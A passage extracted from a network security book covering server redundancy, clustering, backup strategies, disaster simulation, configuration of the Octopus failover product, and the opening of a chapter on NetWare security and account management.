network is that the secondary \nserver can be located anywhere, even at a remote facility. Since the secondary server can be safely tucked away in \nanother location that is miles away, the setup is far more fault resilient to facility-wide problems such as fire, \nlightning strikes, floods, or even cattle stampedes. \nIf you do not have a link between the two systems, memory information is not shared and the secondary is not \ncapable of stepping in immediately. A client request originally sent to the primary server would have to time out \nand be reset before it could be serviced by the secondary server. This would add a delay of a minute or two before \nthe secondary is fully utilized. Another drawback is increased network utilization. This is because all information \nis shared over the network, not over an isolated link between the two systems. \nServer redundancy can be implemented at the operating-system level or as an add-on product. Novell’s SFT-III \nand Microsoft’s Cluster Server (MSCS) are good examples of support at the operating-system level for running \nredundant servers. There are also many third-party offerings from companies like Vinca, Network Integrity, and \nQualix Group that are capable of adding redundant server support. The option you choose will depend on the \nfeatures you are looking for. Each product supports redundant servers in a slightly different fashion. \n" }, { "page_number": 246, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 246\nClustering \nClustering is similar to redundant servers, except that all systems take part in processing service requests. The \ncluster acts as an intelligent unit in order to balance traffic load. From a client’s perspective, a cluster looks like a \nsingle, yet very fast server. If a server fails, processing continues but with an obvious degradation in performance. \nWhat makes clustering more attractive than server redundancy is that your secondary systems are actually \nproviding processing time; they do not sit idle waiting for another system to fail. This insures that you get the \nhighest level of utilization from your hardware. \nLinux Clustering \nAn excellent example of clustering is the Beowulf project at NASA’s Goddard Space Flight Center (GSFC). Back \nin 1994, NASA’s Center of Excellence in Space Data and Information Sciences (CESDIS) clustered 16 Linux \nsystems together. All systems were based on the Intel 486DX4 100MHz chip, and the total cost of the cluster was \nless than $50,000. All communications between the clustered systems utilized a set of 100Mb Ethernet networks. \nThe goal was an inexpensive alternative to the high-end workstations that were being used for Earth and space \nscience applications. \nThe resulting cluster had a combined processing speed capable of 1.2 billion floating point operations per second \n(Gigaflop) and up to eight times the disk I/O bandwidth of a conventional system. This placed the Linux cluster on \npar with supercomputers costing four to five times more. \n \nClustering is an excellent solution for boosting both fault tolerance and performance, and is available for UNIX, \nVMS, and Microsoft NT and 2000. \nData Backup \nKeeping a duplicate copy of your data has always been the best way to protect against disaster, corruption, or loss. \nAlthough traditional methods rely on tape, newer backup methods are starting to gain the attention of companies—\nincluding Internet-based backups that provide for offsite storage and a reduction of in-house maintenance of \nbackup equipment and procedures. \nTape Backup \nThe mainstay of most network administrators, tape backups are the method of choice for protecting or restoring \nlost, corrupted, or deleted information. All of the server-based options we have discussed so far have focused on \nmaintaining or restoring the server as a service. None is capable of restoring that proverbial marketing file that was \ndeleted over three months ago. Here is where tape backups come in: their strength is in safeguarding the \ninformation that actually gets stored on the server. \nNote \nThe ability to restore files becomes even more important if you are using UNIX or \nWindows NT as a file server. Neither of these operating systems includes a utility for \nrestoring deleted network files. \nMost backup software supports three methods of selecting which files should be archived to tape. These methods \nare \nƒ \nFull backup \nƒ \nIncremental backup \nƒ \nDifferential backup \nFull Backups \nAs the name implies, a full backup is a complete archive of every file on the server. A full backup is your best bet \nwhen recovering from a disaster: it contains a complete copy of your entire file system, consolidated to a single \ntape or set of tapes. The only problem with performing a full backup is that it takes longer to complete than any \nother backup method. If you need to back up large amounts of information (say 10GB or more), it may not be \nfeasible to perform a full backup every night. \nIncremental Backups \nIncremental backups only copy to tape files that have been recently added or changed. This helps to expedite the \nbackup process by only archiving files that have changed since the last backup was performed. The typical \n" }, { "page_number": 247, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 247\nprocedure is to perform a full backup once a week and incremental backups nightly. If you needed to rebuild your \nserver, you would first restore the full backup, and then every incremental backup created since the full backup \nwas performed. \nThe one flaw in incremental backups is that they do not track deletions. This means you could potentially end up \ntrying to restore more data than you have capacity for. For example, consider Table 12.1. Let’s say you have a \n12GB drive on which you are storing file information. At the beginning of the day on Monday, you have 10GB of \nfiles saved on this disk. In the course of the day, you add 1GB of file information. At the end of the day, you \nperform a full backup, which writes 11GB of data to tape. \nTable 12.1: Storage Problems with Incremental Backups \nDay \nStorage \nUsed \nFile \nAdd\ns \nFile \nDel\netes \nSaved \nto \nTape \nMonday \n10GB \n1GB \n0GB \n11GB \nTuesday \n11GB \n1GB \n3GB \n1GB \nWednesday \n9GB \n2GB \n0GB \n2GB \nThursday \n11GB \n1GB \n3GB \n1GB \nYou start the day on Tuesday with 11GB out of the 12GB used for storage. In the course of the day, you add 1GB \nof files but delete 3GB in order to free up disk space. At the end of the day, you perform an incremental backup \nand save 1GB of new data to tape. \nYou start the day on Wednesday with 9GB out of 12GB used for storage. You add 2GB of files and perform an \nincremental backup, saving 2GB of data to disk. Thursday you save 1GB of data to disk but delete 3GB. You \nincrementally back up the 1GB of data to tape. At the end of the day on Thursday, you have 9GB out of 12GB \nused for storage. \nFriday morning you walk in and find that someone has performed a bit of housekeeping, deleting all the files from \nyour 12GB drive. You immediately spark up your backup software and restore the full backup performed on \nMonday. You then load the Tuesday incremental tape and restore that, as well. No sooner does the Tuesday tape \nfinish the restore process than you get an “out of disk space” error from the server. Despite the fact that you still \nhave two tapes with 3GB of data to restore, you have no free space left on your 12GB drive. \nThe capacity problem in this example is typical of incremental backups. For this reason, most system \nadministrators perform differential backups instead of incremental. \nDifferential Backups \nA differential backup differs from an incremental backup in that it backs up all files that have changed since a full \nbackup was last performed. It does not back up files from the time of the last backup. For example, if you perform \na full backup on Monday and then a differential backup every other night of the week, the differential backup \nperformed on Thursday night will include all file changes from Tuesday through Thursday. This helps to reduce \nthe chances of the capacity problem you saw in restoring incremental backups. While it is still possible to end up \nwith more data on tape than drive capacity, this problem is far less likely to occur. \nAnother benefit of performing differentials over incrementals is that you only need to restore two tapes after a \nserver crash. This not only expedites the process but also reduces the chance of failure. For example, look again at \nTable 12.1. For an incremental backup, you would need to restore four tapes in order to retrieve all of your data. If \ndifferentials were performed, you would only have to restore two. This reduces your chances of running across a \nbad tape. \nTip \nTape backups are fine for tape storage periods of a year or less. If you need to archive \ninformation for a longer period of time, consider using some form of optical media or \nstoring your tapes in a climate-controlled environment. \nInternet Backups \nAn alternative or addition to tape backups can be Internet backups. Part of a larger outsourcing movement, Internet \nbackups are typically included in a larger service package of outsourced, remote management. Products such as \nConnected’s Connected TLM will automatically and regularly copy encrypted data from an organization and store \nit offsite in a secure facility. \n" }, { "page_number": 248, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 248\nThe advantages of Internet backups include \nLow Administrative Overhead Because local implementation and maintenance is usually limited \nto a small software package, Internet-based backups run seamlessly and without intervention or \nmonitoring on behalf of the internal IT staff of an organization. Tapes do not need to be monitored \nfor quality or deterioration, taken offsite, or secured. \nReduced Risk Because data is always stored offsite, there is never a fear from an onsite disaster \npermanently destroying data. Because data is not being stored on tape, the risk of losing control of \nproprietary or confidential data through theft or negligence is more controlled; no one can simply \nwalk off with a backup tape. \nThere are some significant potential disadvantages with Internet backups, such as: \nSpeed Even with a T1 backups can take a significant amount of time. Although there is an \nincreasing trend of greater bandwidth availability, this pales in comparison to the rate of growth of \ncorporate data. As an example, it would take 2–3 hours to back up a 450MB file over a T1 link. \nRecoverability The time it takes to restore data from an Internet backup is greater than that of a \nlocal backup, and not just because of the slower speed of the connection. Requesting the backup \nservice, locating the data, and initiating the process adds extra overhead to an already slow transfer \nrate. \nDespite the disadvantages, some organizations are adding Internet backups as part of their overall data recovery \nsolution, using the benefit of offsite storage as an additional guarantee against data loss. \nApplication Service Providers \nApplication Service Providers (ASPs) solve the problem of server failure and data loss in a unique way. All data \nservices are outsourced, with only the end-user client application running locally within an organization. All data \nand services are hosted through the Internet. The ASP is then responsible for ensuring the availability and \nredundancy not only of the data, but also of the entire application itself. \nAlthough this is still an emerging solution, it has become an ideal one for many smaller organizations that do not \nhave the budget to maintain either an entire IT staff or hardware/software infrastructure. Larger organizations that \nuse one or two primary lines of business applications can also benefit from entering into tight relationships with \nASPs. \nThe drawbacks of utilizing an ASP become obvious. Should the Internet connection fail, no recourse is available \nfor an organization to get access to their applications or to their data. Billing or service disputes with the ASP can \nmean that data is held hostage, and continued business is stopped until the dispute is resolved. \nAlso, service alternatives are restricted to a single company. Switching between ASPs can be difficult, and the \nportability of data can be impossible, leaving an organization without critical assets. \nServer Recovery \nWhile tape backups are fine for protecting file information, they are not a very efficient means of recovering a \nserver. Let’s assume that you suffer a complete server failure and you need to rebuild the server on a new \nhardware platform. The steps to perform this task would include \n1. Installing the server operating system \n2. Installing any required drivers \n" }, { "page_number": 249, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 249\n3. Installing any required service packs \n4. Installing any required hotfixes or security patches \n5. Installing the backup software \n6. Installing any required patches to the backup software \n7. Restoring your last full backup tape \n8. Restoring any incremental or differential tapes as required \nThis is obviously a very time-consuming and labor-intensive process. It would be a minor miracle if this server \ncould be put into operation in anything less than a full day, especially if it is used to store a lot of data. \nThe alternative is to use a package specifically designed for server recovery. Typically, these packages will create \na small number of boot disks along with an image of the server. The boot disks allow the system to be started \nwithout an operating system. The server recovery software will then access the previously created image and \nrestore all the data to the server. Once the server reboots, it is back in operation. \nSome vendors make server recovery products that will integrate directly with a backup solution. For example, the \nARCServe product line from Computer Associates includes both a backup program and a server recovery \nprogram. If you are using ARCServe for performing your nightly backups, it makes sense to also obtain a copy of \nthe ARCServe disaster recovery option. This is because the recovery option is capable of reading the ARCServe \nbackup tapes. This allows the recovery program to automatically restore your server to the configuration it had \nduring the last full backup. If you purchased a server recovery program from another vendor, you would have to \nmaintain the image file separately to insure that it stays up to date. \nThe only drawback to a server recovery solution is that it saves the entire system as an image. While this expedites \nboth the backup and the restore process, it also means that you cannot access individual files. Even with a server \nrecovery solution, you still need a regular backup solution to replace that occasional lost file. \n \nSimulating Disasters \nBy now you should have quite a few ideas about how to make your network more fault resistant and how to \nrecover from failures when they occur. It is not enough to simply implement a disaster solution; you must test and \ndocument your solutions, as well. Testing is the only way to insure that the recovery portion of your plan will \nactually work. Documenting the process is the only way to insure that the correct procedure will be followed when \ndisaster does occur. \nNondestructive Testing \nNondestructive testing allows you to test your disaster prevention and recovery plans without affecting the normal \nworkflow of your operation. This is the preferred method of testing: you do not want to cause a disaster while \ntesting out a potential solution. For example, 9:00 AM on a Monday morning is not the best time to initially test out \nthe hot-swappable capability in your server’s drive array. \nThe Importance of Disaster Simulation \nI cannot overemphasize the importance of testing your disaster recovery solution. I once consulted for a company \nthat wanted to implement a facility-wide disaster recovery solution. In other words, the company wanted to insure \nthat if the whole building went up in smoke, it could recover to a remote facility and be back in operation within \n96 hours. It was expected that most of the data would be migrated to this other facility via backup tape, as the \nremote facility was also used for offsite tape storage. \nOnly when we simulated a disaster did we find one minor flaw. The DEC tape drive sitting on the main production \nserver was incompatible with the tape drive on the replacement server. In fact, the tape drive on the production \nserver was so old, we could not obtain a duplicate drive to read the tapes created by the production system. Had \nthis been an actual failure, recovery would have taken a wee bit longer than 96 hours. \nThe solution was twofold: \nƒ \nReplace the tape drive on the production server with an identical model to that of the \nreplacement server. \nƒ \nDocument that any future tape drive upgrades must be duplicated on both systems. \n" }, { "page_number": 250, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 250\n \nThere are a number of ways you can implement nondestructive testing. The most obvious is to use alternative \nhardware in order to simulate your disaster. For example, you could take another server that is identical to your \nproduction server and try to restore your backups to this alternative system. \nNot everyone has the luxury of redundant components at their disposal in order to test their recovery plans. If \nyou’re not one of the lucky ones, try to plan your testing around plant shutdowns or extended holidays. Although \nthe last thing anyone wants to do is to spend a long weekend simulating network outages, it is far preferable to \nexperiencing an actual disaster. There is nothing worse than a server outage at 9:00 on a workday morning that has \nbeen caused by a part that must be special ordered. Simulating your disasters ahead of time helps to insure that you \nwill be capable of a full recovery when an actual disaster does occur. \nDocument Your Procedures \nThe only thing worse than spending a long weekend simulating network outages is spending a long weekend \nsimulating network outages and writing documentation. As networking staff levels continue to drop, it is hard \nenough to keep up with the day-to-day firefighting, let alone simulate additional disasters and document your \nfindings. We all like to think that we have minds like a steel trap and we will remember every last detail when an \nactual disaster does occur. \nThe fact is that the stress of trying to restore a lost service or deleted information can make the best of us a little \nsloppy. It is far easier to document the process when you can take your time and think things through with a clear \nhead. When you are under pressure, it is far too easy to try a shortcut to get things done more quickly—only to \nfind that your shortcut has made matters worse. Documenting the process when you are not under the gun to \nrestore service allows you to write up a clear set of instructions to follow. \n \nnever know the difference. \nInstalling Octopus \nOctopus must be installed on every system that will act as an Octopus target or an Octopus source. To begin the \ninstallation process, insert the CD into an NT server and launch the Setup executable. This will produce the Site \nSelect dialog box, shown in Figure 12.6, which prompts you to enter the Microsoft machine name of the system on \nwhich you wish to install Octopus. You can type in the server name (as I have done in the figure) or you can click \nthe Get button in order to search the network for NT servers. The Network Sites section of the dialog box allows \nyou to customize the amount of information that is reported during a Get. Once you have entered the correct server \nname, click Continue. \n \nFigure 12.6: The Octopus Site Select dialog box \n" }, { "page_number": 251, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 251\nTip \nUsing Get to search the network for NT servers is an extremely slow process. You should \ntype in the server name directly whenever possible. \nYou are next prompted to select a path for the program and data files, as shown in Figure 12.7. These storage \nlocations will only be used by the Octopus software, not your mirrored shares and files. Later, when you identify \nwhich shares you wish to mirror, you will be able to select a destination on the target system. Once you have \nentered the file paths, click the Continue button. \n \nFigure 12.7: The Install Paths dialog box \nThe final dialog box will prompt you for your license key. You need to visit the Qualix Group Web site \n(www.octopustech.com) or contact the Qualix Group directly with your product’s serial number in order to \ngenerate a license key. Once you have entered this key, the program files will be copied to your hard drive and you \nwill be prompted to reboot the NT server. \nNote \nRemember that you must install a copy of Octopus on every server that will be acting as \neither a source or a target. \nConfiguring Octopus \nWhen you log on to the 2000 or NT server and launch the Octopus icon, you will be presented with the Octopus \nconsole shown in Figure 12.8. All share replication is configured from the Octopus source, so if you are not \ncurrently sitting at the source’s console, you can connect to the source system by selecting Functions ¾ Attach \nfrom the console menu. This will produce the same Site Select dialog box you worked with during the product \ninstallation. You can either type in the name of the Octopus source NT server you wish to connect to or use the \nGet button to search the network for NT servers that have Octopus installed. Once you select the source you wish \nto work with, the console will become active for that system. \n \nFigure 12.8: The Octopus console screen \nNext you need to add a specification that identifies which information you wish to replicate and to which source. \nSelect Maintenance ¾ Add Specification ¾ Share from the Octopus console menu. This will produce the Mirror \nShares screen shown in Figure 12.9. You should first configure your system to replicate all share information. \nWarning \nOctopus can only mirror unique share names. This means that two Octopus \nsources sharing the same target must not have any shares with the same \nname. If they do, one of the shares will be disabled on the target system in \n" }, { "page_number": 252, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 252\norder to avoid conflicts. \n \nFigure 12.9: Replicating shares with the Mirror Shares screen \nThe Exclude Shares field allows you to specify certain shares that you do not wish to replicate. To save all shares \nexcept for the administrative shares, leave this option blank. The Target Site field allows you to identify the \nOctopus target where this share information will be saved. Finally, selecting the Synchronize check box will cause \nthis information to be immediately replicated to the target system. When all of your options are set, click the OK \nbutton. \nYou also need to identify which directories you wish to replicate. This is done by adding another specification, as \nshown in Figure 12.10. You can only specify one directory path per specification. If you need to replicate multiple \ndirectories, simply create additional specifications. Checking the Include Subdirectories box will cause Octopus to \nreplicate all directories located under the specified source directory. \n \nFigure 12.10: Replicating files with the Select Source screen \nYou also need to specify a target system and a target directory. This should be the same target system that will \nhold the shares, but you can locate the directory information anywhere you choose. Once you have finished, click \nOK and add shares as required. Your Octopus console screen should now appear similar to Figure 12.11. \n \nFigure 12.11: The Octopus console with directory specifications \nThe left windows of the Octopus console show that the Octopus source is set up to replicate to the target system \nLAB31. The green traffic lights tell you that these systems are still able to communicate with each other. Under \nthe target systems, you can see all the specifications you have configured. In this example, we are replicating the \nlabfiles directory. The right pane shows the current replication status of the specification highlighted in the top \npane. In Figure 12.11, you can see that Octopus found and replicated 525 files within the labfiles directory. \n" }, { "page_number": 253, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 253\nNow that your file information is being replicated, you need to tell your Octopus systems how they should respond \nwhen a failure occurs. This is done by selecting Switch-Over ¾ Source Options from the Octopus console screen. \nThis displays the Source Options dialog box, as shown in Figure 12.12. \n \nFigure 12.12: The Source Options window \nThe Timeouts tab allows you to set up communication parameters between the source and the target system. The \nsettings in Figure 12.12 tell the source to transmit a heartbeat every 15 seconds. The target is configured so as not \nto assume that the source is offline unless 60 seconds pass in which the target receives no heartbeat transmission. \nThese settings help to insure that one or two lost packets do not trigger the fail over process. \nIf you click the IP Addresses to Forward tab, you can specify whether the target system should assume the IP \naddress of the source system when it fails. You can even specify multiple network cards. This insures that systems \nthat use DNS or WINS to locate the source system will be directed to the target system after a failure. \nNote \nRemember that the target can only assume the IP address of the source if the two systems \nare located on the same logical network. \nThe final tab, Cluster To, allows you to specify the target system. If you have created a specification (as we did \nearlier in this configuration), this value should be filled in for you and should not need to be changed. Once you \nhave configured your Source Options, you can click OK to save your changes. \nFinally, you need to configure the options for your target system. To do this, select Switch-Over ¾ Target Options \nfrom the Octopus console screen. This will produce the clustering Target Options dialog box, as shown in Figure \n12.13. \n \nFigure 12.13: The Target Options window \nThe Options tab lets you configure how the target responds when it needs to stand in for another system. You can \ndefine executables or batch processes to run when a target stands in, as well as when the source returns to \noperation. You can also specify whether the target should replace its IP address with that of the source or whether \nit should use both addresses simultaneously. If you click the Take Over tab, you will see any current sources that \nthis target has taken over. \nThe Services tab allows you to specify which services should be run on the target system once a fail over has taken \nplace. By default, all services on the target system are restarted when the target needs to stand in for a source. This \n" }, { "page_number": 254, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 254\nallows the Octopus target to assume machine names and IP addresses as required. You can, however, specify that \ncertain services are not to be restarted and even set certain services to be run only once a fail over takes place. \nThe Account tab is for entering authentication information. This is only required if the source is a stand-alone \nserver and the target needs to provide a new System ID (SID). If the source is a PDC or a BDC, this information is \nnot required. \nThe Notification tab allows you to specify who should be notified when the target needs to stand in for the source. \nAn alert can be sent to an e-mail address, to an NT logon name as a pop-up message, or even to an entire domain. \nOnce you have finished configuring your target options, click OK to save your changes. Your source and target \nsystems are now configured to provide server-level fault tolerance in case of disaster. \nTesting Octopus \nIn order to show you how a fail over would look to the average end user, I have configured three Octopus systems \nfor testing. Two of them (www and holnt200) are Octopus sources, while the third (lab31) is set up as the Octopus \ntarget. Table 12.2 shows the share names being used by each system. \nTable 12.2: Share Names Used on the Octopus Test Systems \nHost \nConfiguration \nShares \nwww \nOctopus \nsource \nhotfix, \nlabfiles \nholnt200 \nOctopus \nsource \naccounting, \nmarketing, \nlast_share \nlab31 \nOctopus \ntarget \n<> \nOnce the sources were configured, the systems were allowed to sit until replication was complete. The replication \nprocess took less than 10 minutes. Once this process was complete, lab31 had a copy of every share located on the \ntwo Octopus sources. A Network Neighborhood view of these shares is shown in Figure 12.14. \n \nFigure 12.14: Lab31 with a copy of all shares \nI then pulled the power plug (literally) on servers www and holnt200 and allowed one minute to elapse for the \ntarget to figure out that these two source systems were offline (this was the configured stand-in time). At just over \na minute, a notification was sent to the domain administrator that these two source systems were no longer \nresponding. Switch-Over ¾ Target Options ¾ Take Over from the Octopus console screen was then checked in \norder to see if lab31 had in fact stepped in for www and holnt200. As shown in Figure 12.15, this process had \nalready been completed. The Added Names field shows us what source systems the target has stepped in for. \n" }, { "page_number": 255, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 255\n \nFigure 12.15: The Target Options Take Over tab \nTo confirm that the target had stepped in for the source systems, I launched Network Neighborhood from a \nWindows 95 test system. As shown in Figure 12.16, the client Hellsfarr was fooled into thinking that all the \nservers were still online and functional. Response time for the Neighborhood search was no longer than when the \nservers were actually online. \n \nFigure 12.16: Lab31 standing in for www and holnt200 \nFinally, both www and holnt200 were checked to insure that the correct share names were associated with the \ncorrect systems. As shown in Figure 12.17, lab31 associated the correct share names with the system www. \nOpening up each share produced the expected list of files. \n \nFigure 12.17: Lab31 advertising the correct shares for www \n \nSummary \nIn this chapter, you saw what disaster prevention and disaster recovery options are available \nfor protecting your network. We discussed network-based disasters and server-based \ndisasters. We also discussed the importance of testing and documenting your disaster \n" }, { "page_number": 256, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 256\nrecovery procedures. Finally, you took a look at a product designed to provide redundant-\nserver fault tolerance in an NT server environment. \nIn the next chapter we will discuss Novell NetWare, looking at what insecurities exist in the \noperating system and what you can do to lock it down. \n \nChapter 13: NetWare \nReleased in 1983, Novell NetWare has become the mainstay for a majority of networks for providing file and print \nservices. As of version 4.11, Novell has included a number of IP applications that are designed to facilitate the \nconstruction of an internal Internet, known as an intranet. An intranet provides many of the connectivity options \nusually associated with the Internet (HTTP, FTP, and so on), except access to these resources is restricted to \ninternal personnel only. \nAs of version 5.0 (the most current version is 5.1), NetWare includes native support for the IP protocol. While \nNetWare has supported client communication under IP for a while using NetWareIP, NetWareIP was simply an IP \ntunnel carrying IPX traffic. NetWare version 5.0 allows you to remove IPX from the picture entirely. \nThe default security posture of a NetWare server is pretty tight. The file system supports a detailed level of \npermissions, and users are provided very little access to system resources by default. There are still a few things \nyou can do, however, to increase security. \nNetWare Core OS \nThe core of NetWare is a 32-bit, multitasking, multithreaded kernel. Symmetrical multiprocessor support is \nincluded with the core OS. The kernel is designed to be modular. This means that applications and support drivers \ncan be loaded and unloaded on the fly. \nTip \nIt also means that most of the changes can be made without rebooting the system. Need to \nchange an IP address? This can be done with two commands at the command prompt and \ntakes effect immediately. This can be a lifesaver for environments that cannot afford to \nreboot a server every time a change has been made. \nAs of version 5.0, NetWare includes support for Java. The Novell Java Virtual Machine (JVM) allows the server \nto support the execution of Java scripts. This lets you develop or run Java-based applications directly off the \nserver. \nNetWare versions up to 4.x were designed to run completely within the physical memory installed on the server. \nIn other words, swap space or virtual memory was not supported. This means that the total memory available to \nthe operating system is what was physically installed on the server. \nNote \nNetWare version 5.0 added support for virtual memory. \nMemory never goes to waste on a NetWare server. Any memory that remains after the core OS, supporting \napplications, and drivers have been loaded goes to caching frequently accessed files. The more available memory, \nthe more files can be cached. This means that when a user requests a commonly used file, the server can access the \ninformation from faster memory instead of disk. When the operating system requires additional memory, it takes \nthat memory from the file-caching pool. \nNovell has also improved recovery from critical system errors, called abnormal ends or ABENDs. In previous \nversions of NetWare, an ABEND would cause a server to stop all processing. The only forms of recovery were to \nrestart the server through the online debugger or to hit the power switch. \nNetWare also has the ability to restart the server after a predetermined period of time if an ABEND occurs. You \ncan even select what kind of an ABEND causes a server to restart. For example, you can set the server to simply \nrecover from application ABENDs but to perform a system restart if the failure mode is hardware related. \nNetWare includes a garbage collection setting. While this will not stop by your cubicle and empty your trash, it \ncan recover server memory from unloaded processes. \nWith earlier versions of NetWare, if a poorly coded application was unloaded from memory, the application might \nnot have returned all the memory it was using to the free memory pool. This is a common problem with \napplications running on any operating system. The garbage collection process scans for these memory areas that \nare no longer in use. When it finds them, the pointers are deleted and the space is returned to the free memory pool \nfor use by other applications. \n" }, { "page_number": 257, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 257\nNew features have been added to insure that applications do not tie up the processor(s) for an excessive amount of \ntime. NetWare includes a relinquish control alert setting that produces an error message when an application \nrefuses to play fair and share the available CPU cycles. There is also a CPU hog timeout setting, which allows the \nsystem to automatically kill any process monopolizing all of the server’s processor time. \nC2 Certification \nNetWare is the only distributed network operating system to receive C2 certification as a trusted network \ncomponent from the National Computer Security Center (NCSC). While NT is also C2 certified, at the time of this \nwriting it is not approved as a trusted network, only as an operating system. Even then, it is only certified as a \nstand-alone workstation with no removable media or network connection. NetWare is also being evaluated for \nElectronic Data’s E2 rating. E2 is the European counterpart to C2. The specifications of each are very similar. \nC2 Specifications \nIn order to be approved as a C2 trusted network component by the NCSC, a product is expected to meet the \nfollowing specifications: \nƒ \nThe system must be able to uniquely identify every system user. \nƒ \nThe system must be able to selectively track user logons and object changes. \nƒ \nThe system must be able to maintain an audit log. \nƒ \nThe system’s audit log must identify the source of all entries (which remote system, \nterminal, or server console). \nƒ \nThe system administrator must be able to restrict access to the audit log. \nƒ \nThe system must have a method of setting individual and group access control. \nƒ \nThe system administrator must have a method of limiting the propagation of access \ncontrol rights. \nƒ \nThe system administrator must have a method of validating that the system is functioning \ncorrectly. \nƒ \nThe system must include a manual describing all security features. \nƒ \nThe security features must be tested by the NCSC and found to have no obvious flaws. \nIt is the final specification (no obvious flaws) that seems to trip up most systems submitted for C2 trusted network \napproval. C2 certification does not guarantee that your system will be impenetrable. It does, however, tell you that \nthe product has been designed with security in mind and that these security precautions have been accepted by a \nthird-party government agency. \n \nNetWare Directory Services \nFor access control, NetWare uses NetWare Directory Services (NDS), which provides a hierarchical approach to \nassigning and managing network access rights. This allows an entire networking environment to be managed \nthrough a single console. NDS also provides an extremely detailed level of control over user access to network \nresources. An organization’s NDS structure is commonly referred to as the NDS tree. \nThe structure of NDS is similar to the directory structure on a hard drive. Subdirectories known as Organizational \nUnits (OU), or containers, can be defined off the root. Access rights can be set on each of the containers so that \nusers only have access to the resources they need. You can define more containers to organize user access even \nfurther. \nNote \nIt is even possible to assign subadministrators who only have supervisor-type privileges \nfor a small portion of the tree. NDS scales extremely well because it allows a large \norganization to have administrators who can only manage the resources for their specific \ngroups, while allowing full management rights to the people responsible for the entire \nnetwork. Rights are assigned on a trickle-down basis, meaning a user will assume rights to \nall subcontainers unless you specifically set the permissions otherwise. \n" }, { "page_number": 258, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 258\nNetwork access is also centralized. When a user logs in to the network, she authenticates to the entire NDS tree, \nnot just a specific server or portion of the tree. This means that she automatically receives access to all network \nresources that have been assigned to her—even if that resource exists on a remote portion of the tree (such as a \nprinter in a remote field office). \nNDS Design \nFor an example of how an NDS tree may be configured, take a look at Figure 13.1. The organization Cam has \nbeen broken up into five geographic locations: Albuquerque, Boise, Los Angeles, Salt Lake City, and Tampa. Any \nuser assigned access to the geographic containers can be granted access privileges to all resources at that location. \nIf each location has its own IS staff, this is where you would create IS staff accounts. By defining these \nadministrators within the geographic containers, you can give them access to all on-site resources while insuring \nthat they have no access to resources at other locations. Further, you could create a small number of user accounts \ndirectly under the Cam container, which would allow these administrators to manage the entire tree. \n \nFigure 13.1: An example NDS tree \nAt each geographic location, you could define further containers in order to structure your resources by \ndepartment. This allows you to organize your network resources beyond geographic location. For example, look at \nthe HQ container (underneath the Tampa organization) in Figure 13.1. Within the HQ container, we have defined \na number of user groups as well as the printer, file, and application resources these user groups will need access to. \nThis simplifies security management: you can organize network objects based on their access requirements. \nNDS can even deal with specialized cases in which users need access to multiple containers within the tree. For \nexample, let’s say that Knikki is the accountant of Cam, Inc., and so requires access to all financial data. You do \nnot wish to grant Knikki access to the entire NDS tree, however, because Knikki has been known to poke around \nwhere she does not belong. \nIn Knikki’s case, you could simply create a user object for her under one of the containers (which has been done \nunder Salt Lake City, but is not shown in the figure), then alias her user object within the other containers where \nshe requires access. The Knikki object in Figure 13.1 is simply an alias that points back to the original. This allows \nyou to make access control changes and have them linked to all of the Knikki objects. Using aliased objects allows \nyou to give Knikki access to the resources she needs without giving her access to the entire tree. \nAccount Management \nStarting with NetWare 5.0, user accounts are managed using ConsoleOne, a Java-based utility. NetWare 4.x used \nNetWare Administrator (nwadmin), and NetWare 3.x used syscon. Because ConsoleOne can run the server itself, \nit is no longer necessary to have a separate workstation to perform basic account management. \nAs a result, account management could not be easier. In order to view all security settings for a specific user, \nsimply right-click the user object and select Details. This pulls up a user information screen similar to the one \nshown in Figure 13.2. As you can see, this single console lets you administer all aspects of this user account, \nincluding password restrictions, file access rights, and even the user’s logon script. In the next few sections, we \nwill look at some of the security administration you can perform through this console. \n" }, { "page_number": 259, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 259\n \nFigure 13.2: Managing the user Comodus with ConsoleOne \nIdentification \nThe Identification button allows you to record information about a user beyond his or her logon name. This \ninformation can include \nƒ \nFull name \nƒ \nLocation \nƒ \nDepartment \nƒ \nPhone number \nƒ \nDescriptive information, such as the user’s direct supervisor \nWhile the ability to record detailed user information may not seem like a security feature on the surface, it can be \ninvaluable if you are tracking down a problem. \nLet’s say you are reviewing your system and you see some suspicious activity coming from the user account \njsmith. It appears that jsmith may be trying to gain access to the payroll database. Using ConsoleOne, you quickly \nlook up jsmith’s account information and find out that he reports to Toby Miller at extension 1379. Armed with \nthis information, you quickly give Toby a call to attempt to catch jsmith in the act. \nTip \nWhen performing a system audit, it is extremely beneficial to have access to detailed user \ninformation. This allows you to correlate logon activity and audit log entries with actual \nusers. In a large environment, it is extremely unlikely that a system administrator will have \nevery user’s logon name committed to memory. \nLogon Restrictions \nThe Logon Restrictions button allows you to assign a predetermined expiration date for each account. This is \nuseful if your organization works with temporary employees. The Logon Restrictions screen also allows you to \ndisable an account and limit the number of concurrent connections each user may have. \nLimiting the number of server connections a user can have is beneficial if you are worried about users giving out \ntheir authentication credentials. If the number of concurrent connections is limited to one, a user will be far less \nlikely to let someone else use his logon. This is because once the other user logs on under his name, the user will \nbe unable to log on at the same time. \nLimiting concurrent connections is also a good way to identify stolen accounts. If a user attempts a logon and \nreceives a message that he is logged on from another system, he can inform the administrator, who can then track \ndown the potential attacker. \nPassword Restrictions \nThe Password Restrictions button allows you to define password criteria for each user. Here is a list of the \nparameters you can set on this screen: \n" }, { "page_number": 260, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 260\nƒ \nAllow users to change their own passwords. \nƒ \nDefine whether the account is required to use a password. \nƒ \nDefine a minimum number of characters for the password. \nƒ \nRequire that this account always use a unique password. \nƒ \nDefine how often the password must be changed. \nƒ \nDefine the number of incorrect logon attempts before the account becomes locked. \nƒ \nChange the account’s current password. \nTip \nPassword restrictions under NDS are extremely flexible: you can define parameters on a \nuser-by-user basis. For example, you could require regular users to use a password of at \nleast six characters. Additionally, you could require network administrator 